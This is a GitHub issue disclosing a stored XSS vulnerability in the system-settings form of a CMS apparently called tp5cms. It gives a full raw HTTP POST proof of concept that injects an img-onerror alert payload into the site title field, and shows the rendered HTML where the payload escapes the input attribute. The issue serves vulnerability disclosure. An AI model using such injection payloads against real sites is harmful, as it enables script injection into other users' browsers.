Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
System setting position exists an XSS vulnerability poc:
POST /tp5cms-master/admin.php/system/set.html HTTP/1.1 Host: 192.168.43.15 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://192.168.43.15/tp5cms-master/admin.php/system/set.html Cookie: PHPSESSID=bpgp1b6kfpl84tdk4lj4mj4q16 Connection: close Upgrade-Insecure-Requests: 1 Content-Type: multipart/form-data; boundary=---------------------------1161322754603 Content-Length: 393 -----------------------------1161322754603 Content-Disposition: form-data; name="title" "><img src=xss onerror=alert(1)> -----------------------------1161322754603 Content-Disposition: form-data; name="keywords" test -----------------------------1161322754603 Content-Disposition: form-data; name="description" test -----------------------------1161322754603--
location:
<form action="/tp5cms-master/admin.php/system/set.html" method="post" id="myform" name="myform" enctype="multipart/form-data"> <table class="insert-tab" width="100%"> <tbody> <tr> <th>网站标题:</th> <td> <input class="common-text" id="title" name="title" style=" width:800px;" value=""><img src=xss onerror=alert(1)>" type="text"> </td> </tr> <tr> <th>网站关键词:</th> <td> <input class="common-text" id="keywords" name="keywords" style=" width:800px;" value="test" type="text">
The text was updated successfully, but these errors were encountered:
No branches or pull requests
System setting position exists an XSS vulnerability
poc:
location:
The text was updated successfully, but these errors were encountered: